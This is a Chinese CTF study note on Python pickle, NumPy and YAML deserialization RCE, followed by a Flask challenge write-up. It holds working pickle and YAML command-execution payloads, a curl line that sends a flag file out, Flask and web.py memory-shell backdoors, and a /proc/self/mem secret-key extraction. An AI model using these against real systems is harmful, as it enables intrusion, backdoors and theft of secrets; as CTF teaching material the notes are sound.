反序列化
Pickle反序列化
OPCODE
V0版本的opencode
指令 描述 具体写法 栈上的变化
c 获取一个全局对象或import一个模块 c[module]\n[instance]\n 获得的对象入栈
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) o 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) i[module]\n[callable]\n 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N 实例化一个None N 获得的对象入栈
S 实例化一个字符串对象 S’xxx’\n(也可以使用双引号、'等python字符串形式) 获得的对象入栈
V 实例化一个UNICODE字符串对象 Vxxx\n 获得的对象入栈
I 实例化一个int对象 Ixxx\n 获得的对象入栈
F 实例化一个float对象 Fx.x\n 获得的对象入栈
R 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 R 函数和参数出栈,函数的返回值入栈
. 程序结束,栈顶的一个元素作为pickle.loads()的返回值 . 无
( 向栈中压入一个MARK标记 ( MARK标记入栈
t 寻找栈中的上一个MARK,并组合之间的数据为元组 t MARK标记以及被组合的数据出栈,获得的对象入栈
) 向栈中直接压入一个空元组 ) 空元组入栈
l 寻找栈中的上一个MARK,并组合之间的数据为列表 l MARK标记以及被组合的数据出栈,获得的对象入栈
] 向栈中直接压入一个空列表 ] 空列表入栈
d 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) d MARK标记以及被组合的数据出栈,获得的对象入栈
} 向栈中直接压入一个空字典 } 空字典入栈
p 将栈顶对象储存至memo_n pn\n 无
g 将memo_n的对象压栈 gn\n 对象被压栈
0 丢弃栈顶对象 0 栈顶对象被丢弃
b 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 b 栈上第一个元素出栈
s 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 s 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 u MARK标记以及被组合的数据出栈,字典被更新
a 将栈的第一个元素append到第二个元素(列表)中 a 栈顶元素出栈,第二个元素(列表)被更新
e 寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中 e MARK标记以及被组合的数据出栈,列表被更新
序列化
(打印的序列化pickle数据并未包含rce部分)
import pickle
class Student():
a = 'asd'
b = 123
a = new Student()
payload = pickle.dumps(a)
print(payload)
反序列化
(payload已经过修改)
import pickle
class Student():
a = 'asd'
b = 123
payload = b'''cmain
Student
)\x81}(Vsetstate
cos
system
ubVwhoami
b.'''
pickle.loads(payload)
全局变量覆盖
未完待更
R指令RCE
b'''(cos
system
S'whoami'
R.'''
i指令RCE
b'''(S"whoami"
ios
system
.'''
o指令RCE
b'''(cos
system
S'whoami'
o.'''
b指令RCE
b'''cmain
Student
)\x81}(Vsetstate
cos
system
ubVwhoami
b.'''
RCE的前提是有Student类
class Student():
a = 'asd'
b = 123
Numpy RCE漏洞
NumPy 可以通过load方法加载 NumPy 二进制文件和 pickles
默认 NumPy 二进制文件格式会有 ZIP 的魔术头PK\x03\x04和PK\x05\x06,
如果不满足默认的格式,且设置了allow_pickle为True则会执行 pickle.load()方法
本质上还是pickle反序列化,可以运行以下程序生成payload, 生成test.bin
[cmd]处替换为你想执行的命令
import pickle
import os
class Test(object):
def init(self):
self.a = 1
def reduce(self):
return (os.system, ('[cmd]',))
if name == 'main':
tmpdaa = Test()
with open("test.bin",'wb') as f:
pickle.dump(tmpdaa,f)
然后使用numpy加载即可RCE, 注意需要设置allow_pickle=True
import numpy as np
np.load(f'test.bin', allow_pickle=True)
强网杯2022-crash
仅过滤了R指令
此题由于过滤了secret不能直接变量覆盖,但是可以通过代码执行来进行变量覆盖
.............
其它部分已省略
import admin
.............
其它部分已省略
app.secret_key=random.randbytes(12)
class User:
def init(self, username,password):
self.username=username
self.token=hash(password)
def get_password(username):
if username=="admin":
return admin.secret
else:
return session.get("password")
@app.route('/balancer', methods=['GET', 'POST'])
def flag():
pickle_data=base64.b64decode(request.cookies.get("userdata"))
if b'R' in pickle_data or b"secret" in pickle_data:
return "You damm hacker!"
os.system("rm -rf py")
userdata=pickle.loads(pickle_data)
if userdata.token!=hash(get_password(userdata.username)):
return "Login First"
if userdata.username=='admin':
return "Welcome admin, here is your next challenge!"
return "You're not admin!"
.............
其它部分已省略
(1)构造代码执行进行变量覆盖(i指令)
使用exec(类似eval)
b'''(S'exec('admin.se'+'cret="aaaa"')'
ibuiltin
exec
.'''
(2)直接命令执行(i指令)
使用os.system
b'''(S"curl xxx.xxxx/?=cat /flag"
ios
system
.'''
YAML反序列化
基本的程序
import yaml
payload = '''!!python/object/new:bytes
- !!python/object/new:map
- !!python/name:eval
- ["import('os').popen('whoami"]'''
yaml.load(payload)
import yaml
payload = b"""!!python/object/new:subprocess.check_output [["whoami"]]"""
yaml.load(payload.decode("utf-8"), Loader=yaml.Loader)
其它
Flask的内存马等
Flask的内存马适用于pickle反序列化、SSTI等能够达成代码执行,但题目不出网或无回显的情况
参考链接:
https://github.com/iceyhexman/flask_memory_shell
总的来说就是通过获取app对象,使用app对象中的add_url_rule方法添加能够RCE的后门路由达到内存马的效果
首先从sys.modules中获取app对象(sys.modules是一个全局字典,该字典是python启动后就加载在内存中)
getApp = sys.modules['main'].dict['app']
获取APP对象后就能操作当前Flask APP的配置了,
在无回显、不出网的前提下,为了获取RCE回显,此时有四条路可选
打开Flask的Debug模式,抛出Exception来回显
import sys
sys.modules['main'].dict['app'].debug=True
例如pickle反序列化代码执行的情况下使用异常信息来回显
class genpoc(object):
def reduce(self):
s = "raise Exception(import('os').popen('ls /').read())" # 要执行的命令
return exec, (s,) # reduce函数必须返回元组或字符串
关闭Flask的Debug模式,实现一个内存马(通过add_url_rule方法)
import sys
sys.modules['main'].dict['app'].debug=False
sys.modules['main'].dict['app'].add_url_rule('/shell','shell',lambda :import('os').popen('ls /').read())
设置Flask的静态文件目录为/tmp,通过>写命令执行结果
import sys
sys.modules['main'].dict['app'].static_url_path='/static'
sys.modules['main'].dict['app'].static_folder='/tmp/'
import('os').popen('ls / > /tmp/test').read()
时间盲注,命令执行配合sleep逐字符判断,例如如下命令
假设flag是abcd,如果第一个字符为a则会执行sleep 3延时三秒,否则不执行sleep 3
echo 'abcd' | cut -b 1 | grep a && sleep 3
Web.py内存马
感谢NepNep的someb0dy师傅提供的思路,这里顺便记录一下web.py的内存马的实现方法
web.py中可以通过add_processor方法实现一个拦截器,调用handler()即为获取拦截前的路由的结果
def my_processor(handler):
print("before handling")
result = handler()
print("after handling")
return result
app.add_processor(my_processor)
当后端为web.py时的内存马实现方法如下
import sys
def hello(handler):
import subprocess
params = web.input()
cmd = params.cmd
output = subprocess.check_output(cmd, shell=True).decode('utf-8')
return output
app = sys.modules['main'].dict['app']
app.add_processor(hello)
Cat cat
这题是我给CatCTF 2022出的题,
因为看了蓝帽杯2022初赛的Web-file_session觉得很有意思所以就参考了一下(ε=ε=ε=┏(゜ロ゜;)┛
提供docker-compose等文件:https://blog.lxscloud.top/static/post/CTF_Python_Flask/catcat/cat_cat.zip
若想要直接复现可以到我的CTF平台:https://ctfm.lxscloud.top/category/test/challenge/13
同时提供exp文件下载(Python3.6以上):https://blog.lxscloud.top/static/post/CTF_Python_Flask/catcat/getFlag.py
题目首页
进入题目首页可得以下界面
尝试点击绿色文字可以跳转到如下页面,可以猜测可能存在任意文件读取
尝试读取系统文件
检测是否能任意文件读取,读取/etc/passwd成功
读取源码
先读取cmdline获取源码文件名
通过../app.py读取源码
上图读出来的源码很乱,但由前面b开头可知这是python中的bytes类型
可以直接使用bytes的decode()方法获取格式化的源码,如下
a = b'abc\nabc'
print(a.decode())
获取源码如下
app.py
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat
flag = ""
app = Flask(
name,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")
@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])
return render_template("index.html", cats_list=cats_list, cat=cat)
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"
if name == 'main':
app.run(host='0.0.0.0', debug=False, port=5637)
代码审计
从源码可知Python3程序,使用了Flask框架
审计app.py
flag部分
首先关注含有flag的部分,以下代码可知程序一启动就读取并删除flag文件
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")
关注到admin路由可以获取flag,但是需要完成session伪造
需要伪造内容为{"admin" : 1}的session,则需要获取secret key
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"
secret key部分如下,是生成一个uuid然后去除-再拼接*abcdefgh组成的
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
文件读取部分
可以看到任意文件读取功能是info路由提供的,
注意到可控参数有三个,分别是file,start和end
还注意到其中有个cat函数
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))
分析源码可知cat函数由cat.py提供
from cat import cat
审计cat.py
使用同样的方法读取cat.py的源码
import os, sys, getopt
def cat(filename, start=0, end=0)->bytes:
data = b''
try:
start = int(start)
end = int(end)
except:
start=0
end=0
if filename != "" and os.access(filename, os.R_OK):
f = open(filename, "rb")
if start >= 0:
f.seek(start)
if end >= start and end != 0:
data = f.read(end-start)
else:
data = f.read()
else:
data = f.read()
f.close()
else:
data = ("File `%s` not exist or can not be read" % filename).encode()
return data
if name == 'main':
opts,args = getopt.getopt(sys.argv[1:],'-h-f:-s:-e:',['help','file=','start=','end='])
fileName = ""
start = 0
end = 0
for opt_name, opt_value in opts:
if opt_name == '-h' or opt_name == '--help':
print("[*] Help")
print("-f --file File name")
print("-s --start Start position")
print("-e --end End position")
print("[*] Example of reading /etc/passwd")
print("python3 cat.py -f /etc/passwd")
print("python3 cat.py --file /etc/passwd")
print("python3 cat.py -f /etc/passwd -s 1")
print("python3 cat.py -f /etc/passwd -e 5")
print("python3 cat.py -f /etc/passwd -s 1 -e 5")
exit()
elif opt_name == '-f' or opt_name == '--file':
fileName = opt_value
elif opt_name == '-s' or opt_name == '--start':
start = opt_value
elif opt_name == '-e' or opt_name == '--end':
end = opt_value
if fileName != "":
print(cat(fileName, start, end))
else:
print("No file to read")
文件读取功能
cat.py功能比较简单,整段源码最重要的部分如下
下面代码的作用是读取文件并以bytes返回,观察可知可以设定读取位置(start、end)
def cat(filename, start=0, end=0)->bytes:
data = b''
try:
start = int(start)
end = int(end)
except:
start=0
end=0
if filename != "" and os.access(filename, os.R_OK):
f = open(filename, "rb")
if start >= 0:
f.seek(start)
if end >= start and end != 0:
data = f.read(end-start)
else:
data = f.read()
else:
data = f.read()
f.close()
else:
data = ("File `%s` not exist or can not be read" % filename).encode()
return data
使用方法
使用方法如下
例如新建一个a.txt,内容如下
abcdefg
使用app.py读取a.txt,从第1个位置开始到第3个位置
python3 cat.py -s 1 -e 3 -f a.txt
解题
这题的关键点就是伪造session,从而访问admin路由获取flag
但伪造session需要获取secret key
获取secret key
这里可以利用python存储对象的位置在堆上这个特性,
app是实例化的Flask对象,而secret key在app.config['SECRET_KEY'],
所以可以通过读取/proc/self/mem来读取secret key
读取堆栈分布
由于/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃,
所以先读取/proc/self/maps获取堆栈分布
map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\n")
for i in map_list:
map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if map_addr:
start = int(map_addr.group(1), 16)
end = int(map_addr.group(2), 16)
print("Found rw addr:", start, "-", end)
读取对应位置内存数据
然后读取/proc/self/mem,读取对应位置的内存数据,
再使用正则表达式查找内容
res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
if "abcdefgh" in res.text:
secret_key = re.findall("[a-z0-9]{32}\abcdefgh", res.text)
if secret_key:
print("Secret Key:", secret_key[0])
伪造session
session伪造可以利用如下项目
https://github.com/noraj/flask-session-cookie-manager
查看选手wp也发现有选手不是通过admin路由获取flag的,
而是查找内存中的flag变量,然后将包含flag字符的内容保存下来,
最后通过strings配合grep查找
这样当然也行哈,我尝试了下选手的exp发现比较慢,但最终能获取flag
由于也是读mem,这题考点是读mem,所以不算非预期,
只是这种解法相较伪造session那种解法慢一些(我当时测题的时候内存数据没好好检测,没有读到flag哈哈哈哈哈)